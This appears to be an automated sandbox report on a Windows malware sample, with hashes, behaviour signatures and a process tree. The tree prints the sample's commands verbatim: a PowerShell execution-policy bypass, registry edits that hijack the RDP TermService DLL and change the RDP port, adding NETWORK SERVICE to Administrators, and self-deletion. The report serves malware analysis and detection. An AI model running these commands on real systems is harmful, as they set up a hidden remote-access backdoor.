Analysis
- max time kernel: 34s
- max time network: 111s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 09-11-2020 21:08
Static task: static1
Behavioral task: behavioral1
- Sample: 7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: 7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe
- Resource: win10v20201028
General
- Target: 7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe
- Size: 3.8MB
- MD5: 00ae90dd7e86dc9f42dd6df84652122d
- SHA1: ce09069c7a20d4ac0ce4169a27eab84d3d0e5fdf
- SHA256: 7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860
- SHA512: 835808a455f963ffb37bb7d3fabdf7f52f0435b1a4f2e4600148024c25657f4ab579f44c444239d118183365eb8e73820c52fabbf8cb4f49b9372f62633fdee5
Malware Config
Signatures
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
- Deletes itself (1 IoCs)
  Processes (pid | process):
  3080 | powershell.exe
- Drops file in System32 directory (1 IoCs)
  Processes (description | ioc | process):
  File created | C:\Windows\SysWOW64\rdpclip.exe | powershell.exe
- Modifies service (2 TTPs, 2 IoCs)
  Processes (description | ioc | process):
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | reg.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters | reg.exe
- Drops file in Windows directory (8 IoCs)
  Processes (description | ioc | process):
  File opened for modification | C:\Windows\branding\mediasrv.png | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File created | C:\Windows\branding\mediasrv.png | powershell.exe
  File created | C:\Windows\branding\mediasvc.png | powershell.exe
  File created | C:\Windows\branding\wupsvc.jpg | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd | powershell.exe
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (15 IoCs)
  Processes (pid | process | number of events):
  3080 | powershell.exe | 6
  860 | powershell.exe | 3
  4316 | powershell.exe | 3
  2252 | powershell.exe | 3
- Suspicious behavior: LoadsDriver (1 IoCs)
  Processes (pid | process):
  624 | (process name not recorded in the report)
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 3080 | powershell.exe
  Token: SeDebugPrivilege | 860 | powershell.exe
  Token: SeDebugPrivilege | 4316 | powershell.exe
  Token: SeDebugPrivilege | 2252 | powershell.exe
- Suspicious use of WriteProcessMemory (63 IoCs)
  Processes (description | pid | process | target process; each pairing below was recorded 3 times, 21 pairings in total):
  PID 4700 wrote to memory of 3080 | 4700 | 7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe | powershell.exe
  PID 3080 wrote to memory of 4256 | 3080 | powershell.exe | csc.exe
  PID 4256 wrote to memory of 1864 | 4256 | csc.exe | cvtres.exe
  PID 3080 wrote to memory of 860 | 3080 | powershell.exe | powershell.exe
  PID 3080 wrote to memory of 4316 | 3080 | powershell.exe | powershell.exe
  PID 3080 wrote to memory of 2252 | 3080 | powershell.exe | powershell.exe
  PID 3080 wrote to memory of 2884 | 3080 | powershell.exe | reg.exe
  PID 3080 wrote to memory of 3760 | 3080 | powershell.exe | reg.exe
  PID 3080 wrote to memory of 2500 | 3080 | powershell.exe | reg.exe
  PID 3080 wrote to memory of 1476 | 3080 | powershell.exe | net.exe
  PID 1476 wrote to memory of 3128 | 1476 | net.exe | net1.exe
  PID 3080 wrote to memory of 4356 | 3080 | powershell.exe | cmd.exe
  PID 4356 wrote to memory of 4540 | 4356 | cmd.exe | cmd.exe
  PID 4540 wrote to memory of 2100 | 4540 | cmd.exe | net.exe
  PID 2100 wrote to memory of 4556 | 2100 | net.exe | net1.exe
  PID 3080 wrote to memory of 4640 | 3080 | powershell.exe | cmd.exe
  PID 4640 wrote to memory of 4616 | 4640 | cmd.exe | cmd.exe
  PID 4616 wrote to memory of 4872 | 4616 | cmd.exe | net.exe
  PID 4872 wrote to memory of 5080 | 4872 | net.exe | net1.exe
  PID 3080 wrote to memory of 4740 | 3080 | powershell.exe | cmd.exe
  PID 3080 wrote to memory of 5064 | 3080 | powershell.exe | cmd.exe
Processes (process tree; depth given in brackets, children indented under their parent)
- [1] C:\Users\Admin\AppData\Local\Temp\7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\7b347a9267ef967f20817b4ef13026bc3ebcf07a2eecd5bc67c7dfdad0d62860.exe"
  - Suspicious use of WriteProcessMemory
  - [2] \??\c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
    - Deletes itself
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.cmdline"
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6373.tmp" "c:\Users\Admin\AppData\Local\Temp\x20du4vk\CSCC310646AF3AB4146B951B8DFD7FB7E7E.TMP"
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - [3] C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies service
      - Modifies registry key
    - [3] C:\Windows\SysWOW64\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - [3] C:\Windows\SysWOW64\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - [3] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\SysWOW64\net.exe
          Command line: net start rdpdr
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
    - [3] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\SysWOW64\net.exe
          Command line: net start TermService
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
    - [3] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - [3] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5: f3068198b62b4b70404ec46694d632be
  SHA1: 7b0b31ae227cf2a78cb751573a9d07f755104ea0
  SHA256: bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
  SHA512: ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
- C:\Users\Admin\AppData\Local\Temp\RES6373.tmp
  MD5: 076ad6691cad9f3604f3d2a6f8e27ffb
  SHA1: 9ef67ab5ef369eeaec08d07df5adfa4ac07f10cc
  SHA256: 762563c4c9146da8884e6606fa04f96f0143e93fd28bb1655a91788b7034ffa2
  SHA512: 96f35cfe8a7b09480928a0b498414d7de9066997e0a578af901bbddb4bd6ba49b9e1d9142a48ca77707c627d08f36ee7ea5493e9a32f6f828f80e176b11ec216
- C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5: 851bf8df96899b2cc50af8047e9fbe5c
  SHA1: e259d3ea9eabae926f74358b6e8f583cfcb4106b
  SHA256: b920aeb39633531fc8150a758f0d1d697c51f5d7b7dc09a73e68b76948cd39d6
  SHA512: 648ad3ed2b6a1d16d6d43f7a264d3dc3112415c14c7eaab9c214725ca4abfac0640ff8a724c994a8b6d73fe0c3e74339291bf45d63501ac3dcdc40ce38a30792
- C:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.dll
  MD5: 837e1973b2d449b32e0f579780d2c5c6
  SHA1: 68723961c820a3ba0eb42bf47131472d5d7c97f4
  SHA256: d9ad449541e07a9fb278111823c4ccff34a3b50a0ebe34f124936e9fc9a77d3e
  SHA512: 93a47aa54685d9fd2887c743135f768e5d424841c67cd84e2660f4f33f722816791554aef6ecb623cbb41035abbc46a78aeb8b41905065a90729857543cac746
- \??\c:\Users\Admin\AppData\Local\Temp\x20du4vk\CSCC310646AF3AB4146B951B8DFD7FB7E7E.TMP
  MD5: 055814cf745cd28e1dd40ba350a337e4
  SHA1: 961e9bfe0077c70c327571900e3f8089fdb20995
  SHA256: b0a95bd5edb39f87b5e1c711b10c00dd23f1a50534a9b4e795c3355e4b90dd9c
  SHA512: 0e413449ea5cd15f71944b156696b285a83d3c0ab2c18b868409394730e64daed217d1fcf38a06a4214ad62afe0134b57d17fe16d93cb46a4ea68995c00666b9
- \??\c:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.0.cs
  MD5: 6f235215132cdebacd0f793fe970d0e3
  SHA1: 2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
  SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
- \??\c:\Users\Admin\AppData\Local\Temp\x20du4vk\x20du4vk.cmdline
  MD5: 51928b31ec8ce992b8ae3aadcf861a6a
  SHA1: 8cb8df09edfcb73ca6384662598b14abfd16b090
  SHA256: 91fb461e29cb50a66727902c8422d77db8ef3127558ec7796ce3021006b1eb0b
  SHA512: 8db1e6cb97b5fbbe9b530339f56cfaa1ba3ebeebc3a19bc07c3d769154bd9a3238137d9803afedd2a3a705606b35cee4215f5351081dc84aa06fcb2b3017b732
Memory dumps (file, Filesize where recorded)
- memory/860-44-0x00000000091B0000-0x00000000091B1000-memory.dmp, Filesize 4KB
- memory/860-46-0x0000000009300000-0x0000000009301000-memory.dmp, Filesize 4KB
- memory/860-45-0x0000000009360000-0x0000000009361000-memory.dmp, Filesize 4KB
- memory/860-48-0x00000000092F0000-0x00000000092F1000-memory.dmp, Filesize 4KB
- memory/860-23-0x0000000000000000-mapping.dmp
- memory/860-43-0x0000000009050000-0x0000000009051000-memory.dmp, Filesize 4KB
- memory/860-35-0x0000000009070000-0x00000000090A3000-memory.dmp, Filesize 204KB
- memory/860-24-0x0000000074020000-0x000000007470E000-memory.dmp, Filesize 6.9MB
- memory/1476-111-0x0000000000000000-mapping.dmp
- memory/1864-17-0x0000000000000000-mapping.dmp
- memory/2100-115-0x0000000000000000-mapping.dmp
- memory/2252-78-0x0000000074020000-0x000000007470E000-memory.dmp, Filesize 6.9MB
- memory/2252-77-0x0000000000000000-mapping.dmp
- memory/2500-110-0x0000000000000000-mapping.dmp
- memory/2884-108-0x0000000000000000-mapping.dmp
- memory/3080-0-0x0000000000000000-mapping.dmp
- memory/3080-6-0x0000000007EF0000-0x0000000007EF1000-memory.dmp, Filesize 4KB
- memory/3080-1-0x0000000074020000-0x000000007470E000-memory.dmp, Filesize 6.9MB
- memory/3080-13-0x000000000A500000-0x000000000A501000-memory.dmp, Filesize 4KB
- memory/3080-12-0x000000000BF60000-0x000000000BF61000-memory.dmp, Filesize 4KB
- memory/3080-10-0x0000000008750000-0x0000000008751000-memory.dmp, Filesize 4KB
- memory/3080-22-0x00000000093F0000-0x00000000093F1000-memory.dmp, Filesize 4KB
- memory/3080-8-0x0000000008450000-0x0000000008451000-memory.dmp, Filesize 4KB
- memory/3080-7-0x00000000080C0000-0x00000000080C1000-memory.dmp, Filesize 4KB
- memory/3080-21-0x000000000A550000-0x000000000A551000-memory.dmp, Filesize 4KB
- memory/3080-2-0x0000000004F70000-0x0000000004F71000-memory.dmp, Filesize 4KB
- memory/3080-107-0x0000000009B20000-0x0000000009B21000-memory.dmp, Filesize 4KB
- memory/3080-5-0x0000000007F60000-0x0000000007F61000-memory.dmp, Filesize 4KB
- memory/3080-4-0x0000000007CE0000-0x0000000007CE1000-memory.dmp, Filesize 4KB
- memory/3080-133-0x0000000009840000-0x0000000009841000-memory.dmp, Filesize 4KB
- memory/3080-106-0x0000000009510000-0x0000000009511000-memory.dmp, Filesize 4KB
- memory/3080-9-0x00000000088A0000-0x00000000088A1000-memory.dmp, Filesize 4KB
- memory/3080-3-0x0000000007680000-0x0000000007681000-memory.dmp, Filesize 4KB
- memory/3128-112-0x0000000000000000-mapping.dmp
- memory/3760-109-0x0000000000000000-mapping.dmp
- memory/4256-14-0x0000000000000000-mapping.dmp
- memory/4316-51-0x0000000074020000-0x000000007470E000-memory.dmp, Filesize 6.9MB
- memory/4316-50-0x0000000000000000-mapping.dmp
- memory/4356-113-0x0000000000000000-mapping.dmp
- memory/4540-114-0x0000000000000000-mapping.dmp
- memory/4556-116-0x0000000000000000-mapping.dmp
- memory/4616-118-0x0000000000000000-mapping.dmp
- memory/4640-117-0x0000000000000000-mapping.dmp
- memory/4740-121-0x0000000000000000-mapping.dmp
- memory/4872-119-0x0000000000000000-mapping.dmp
- memory/5064-122-0x0000000000000000-mapping.dmp
- memory/5080-120-0x0000000000000000-mapping.dmp